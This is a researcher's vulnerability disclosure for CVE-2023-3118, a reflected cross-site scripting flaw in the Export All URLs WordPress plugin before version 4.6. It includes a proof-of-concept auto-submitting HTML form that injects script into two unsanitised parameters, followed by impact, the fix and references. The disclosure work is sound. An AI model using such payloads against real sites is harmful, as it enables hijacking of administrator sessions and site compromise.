YouGina

Published: 2023-07-13

During my recent code audit of various popular WordPress plugins, I discovered another vulnerability, this time in the Export All URLs WordPress plugin. This vulnerability, assigned CVE-2023-3118, allows for a reflected cross-site scripting (XSS) attack, which can be exploited against high privilege users, including administrators. This article provides detailed information about the vulnerability, its impact, and recommended actions to mitigate the risk.

The Export All URLs WordPress plugin before version 4.6 is vulnerable to a Reflected Cross-site Scripting (XSS) attack. The plugin fails to properly sanitize and escape a specific parameter before outputting it back in the page, potentially allowing an attacker to inject malicious JavaScript code.

The vulnerability can be triggered by making a logged-in admin user visit a page containing the following HTML code:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
        <input type="hidden" name="starting-point" value='"><script>alert(/XSS-starting-point/)</script>' />
        <input type="hidden" name="ending-point" value='"><script>alert(/XSS-ending-point/)</script>' />
        <input type="submit" value="submit">
    </form>
</body>

In the above code, the page includes an HTML form with hidden input fields. The starting-point and ending-point parameters are the ones vulnerable to Cross Site Scripting as they are not properly sanitized and escape special characters. The injected JavaScript code within the value attributes of these parameters will be executed when the form is automatically submitted using the `onload` event in the `<body>` tag.

Impact:

An attacker can exploit this vulnerability by tricking a high privilege user, such as an administrator, into visiting a specially crafted page. Once the user visits the page, the injected JavaScript code will execute within the user's browser, potentially allowing the attacker to perform various malicious actions within the context of the users session, such as stealing sensitive information, modifying website content, performing other actions on behalf of the user. Additionally, the attacker can leverage the compromised admin privileges to further exploit the WordPress environment, potentially leading to a complete compromise of the website or server.

Solution:

To address this vulnerability, the maintainers of the Export All URLs WordPress plugin have released an updated version (4.6) that properly sanitizes and escapes user-supplied input.

Affected Versions:

The reflected cross-site scripting (XSS) vulnerability exists in the Export All URLs WordPress plugin versions prior to 4.6. Users of affected versions should update to the latest version as soon as possible to protect their WordPress installations from potential exploitation.

References:

• Export All URLs Plugin: https://wordpress.org/plugins/export-all-urls/
• CVE-2023-3118: https://nvd.nist.gov/vuln/detail/CVE-2023-3118
• WP-Scan: https://wpscan.com/vulnerability/8a9efc8d-561a-42c6-8e61-ae5c3be581ea